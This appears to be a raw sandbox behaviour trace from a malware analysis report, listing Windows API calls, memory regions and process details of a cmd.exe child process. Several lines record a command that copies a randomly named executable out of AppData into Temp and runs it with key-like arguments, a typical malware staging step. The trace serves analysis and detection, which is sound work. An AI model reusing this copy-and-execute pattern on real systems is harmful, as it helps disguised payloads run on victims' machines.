hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f6a8, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f6a8*=0x0, lpOverlapped=0x0) returned 1 [0100.682] GetLastError () returned 0x0 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] GetFileType (hFile=0x54) returned 0x1 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.682] ReadFile (in: hFile=0x54, lpBuffer=0x4a116640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x18f68c, lpOverlapped=0x0 | out: lpBuffer=0x4a116640*, lpNumberOfBytesRead=0x18f68c*=0x0, lpOverlapped=0x0) returned 1 [0100.682] GetLastError () returned 0x0 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] GetFileType (hFile=0x54) returned 0x1 [0100.682] _get_osfhandle (_FileHandle=3) returned 0x54 [0100.682] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x7b [0100.683] longjmp () [0100.683] _tell (_FileHandle=3) returned 123 [0100.683] _close (_FileHandle=3) returned 0 [0100.683] CmdBatNotification () returned 0x0 [0100.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.683] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.683] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.683] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0100.683] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.683] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0100.683] SetConsoleInputExeNameW () returned 0x1 
[0100.683] GetConsoleOutputCP () returned 0x1b5 [0100.683] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0100.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0100.683] exit (_Code=0) Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16760" os_pid = "0xb0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 639 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 640 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 641 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 642 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 643 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name 
= "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 644 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 645 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 646 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 647 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 648 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 697 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 698 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 699 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 700 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 701 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 702 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = 
"\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 703 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 704 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 705 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 706 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 707 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 708 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 709 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 710 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 711 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 712 
start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 713 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 714 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 715 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 716 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 717 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 718 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 719 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 720 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 773 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 12 os_tid = 0xb10 [0094.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff0c | out: lpSystemTimeAsFileTime=0x20ff0c*(dwLowDateTime=0x77064000, dwHighDateTime=0x1d440a9)) [0094.142] GetCurrentProcessId () returned 0xb0c 
[0094.142] GetCurrentThreadId () returned 0xb10 [0094.142] GetTickCount () returned 0x22d46 [0094.142] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff04 | out: lpPerformanceCount=0x20ff04*=15093151171) returned 1 [0094.143] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0094.143] __set_app_type (_Type=0x1) [0094.143] __p__fmode () returned 0x76b331f4 [0094.143] __p__commode () returned 0x76b331fc [0094.143] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0094.143] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0094.143] GetCurrentThreadId () returned 0xb10 [0094.143] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb10) returned 0x38 [0094.143] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.143] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0094.143] SetThreadUILanguage (LangId=0x0) returned 0x409 [0094.143] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0094.144] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fe9c | out: phkResult=0x20fe9c*=0x0) returned 0x2 [0094.144] VirtualQuery (in: lpAddress=0x20fed3, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe6c, 
dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0094.144] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe6c, dwLength=0x1c | out: lpBuffer=0x20fe6c*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x20000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0094.144] GetConsoleOutputCP () returned 0x1b5 [0094.144] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.144] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0094.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.144] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0094.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0094.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0094.144] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0094.144] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.144] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0094.145] _get_osfhandle (_FileHandle=0) returned 0x3 [0094.145] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0094.145] GetEnvironmentStringsW () returned 0x240370* [0094.145] FreeEnvironmentStringsW (penv=0x240370) returned 1 [0094.145] GetEnvironmentStringsW () returned 0x240370* [0094.145] FreeEnvironmentStringsW (penv=0x240370) returned 1 [0094.145] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, 
phkResult=0x20ee0c | out: phkResult=0x20ee0c*=0x40) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x20, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x0, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.145] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.145] RegCloseKey (hKey=0x40) returned 0x0 [0094.145] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ee0c | out: phkResult=0x20ee0c*=0x40) returned 0x0 
[0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x40, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x1, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x0, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x9, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x4, lpData=0x20ee18*=0x9, lpcbData=0x20ee10*=0x4) returned 0x0 [0094.146] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ee14, lpData=0x20ee18, lpcbData=0x20ee10*=0x1000 | out: lpType=0x20ee14*=0x0, lpData=0x20ee18*=0x9, lpcbData=0x20ee10*=0x1000) returned 0x2 [0094.146] RegCloseKey (hKey=0x40) returned 0x0 [0094.146] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886349 [0094.146] srand (_Seed=0x5b886349) [0094.146] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0094.146] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"START\" \"60000\"" [0094.146] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.146] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x241ad0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0094.146] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0094.146] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0094.146] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.146] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0094.146] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0094.147] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0094.147] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0094.147] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0094.147] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0094.147] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0094.147] _wcsicmp 
(_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0094.147] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0094.147] GetEnvironmentStringsW () returned 0x2424c0* [0094.147] FreeEnvironmentStringsW (penv=0x2424c0) returned 1 [0094.147] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.147] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a120640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0094.147] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0094.147] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0094.147] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0094.147] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0094.147] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0094.147] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0094.147] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0094.147] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0094.147] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fbd8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.147] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fbd8, lpFilePart=0x20fbd4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fbd4*="Desktop") returned 0x18 [0094.147] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.147] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f954 | out: lpFindFileData=0x20f954) returned 0x240b50 [0094.147] FindClose (in: hFindFile=0x240b50 | out: hFindFile=0x240b50) returned 1 [0094.148] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f954 | out: lpFindFileData=0x20f954) returned 0x240b50 [0094.148] FindClose (in: hFindFile=0x240b50 
| out: hFindFile=0x240b50) returned 1 [0094.148] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f954 | out: lpFindFileData=0x20f954) returned 0x240b50 [0094.148] FindClose (in: hFindFile=0x240b50 | out: hFindFile=0x240b50) returned 1 [0094.148] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0094.148] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0094.148] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0094.148] GetEnvironmentStringsW () returned 0x240370* [0094.148] FreeEnvironmentStringsW (penv=0x240370) returned 1 [0094.148] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a115260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0094.149] GetConsoleOutputCP () returned 0x1b5 [0094.149] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0094.149] GetUserDefaultLCID () returned 0x409 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a114950, cchData=8 | out: lpLCData=":") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20fd18, cchData=128 | out: lpLCData="0") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20fd18, cchData=128 | out: lpLCData="0") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20fd18, cchData=128 | out: lpLCData="1") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a114940, cchData=8 | out: lpLCData="/") returned 2 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a114d80, cchData=32 | out: lpLCData="Mon") returned 4 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a114d40, cchData=32 | out: lpLCData="Tue") returned 4 [0094.149] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a114d00, cchData=32 | out: lpLCData="Wed") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a114cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a114c80, cchData=32 | out: lpLCData="Fri") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a114c40, cchData=32 | out: lpLCData="Sat") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a114c00, cchData=32 | out: lpLCData="Sun") returned 4 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a114930, cchData=8 | out: lpLCData=".") returned 2 [0094.150] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a114920, cchData=8 | out: lpLCData=",") returned 2 [0094.150] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0094.150] GetConsoleTitleW (in: lpConsoleTitle=0x230a00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0094.151] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0094.151] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0094.151] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0094.151] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0094.151] _wcsicmp (_String1="type", _String2=")") returned 75 [0094.151] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0094.151] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0094.151] _wcsicmp (_String1="IF", _String2="type") returned -11 [0094.151] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0094.151] _wcsicmp (_String1="REM", _String2="type") returned -2 [0094.151] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0094.155] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\yAQb5Zg8.exe\"") returned 68 
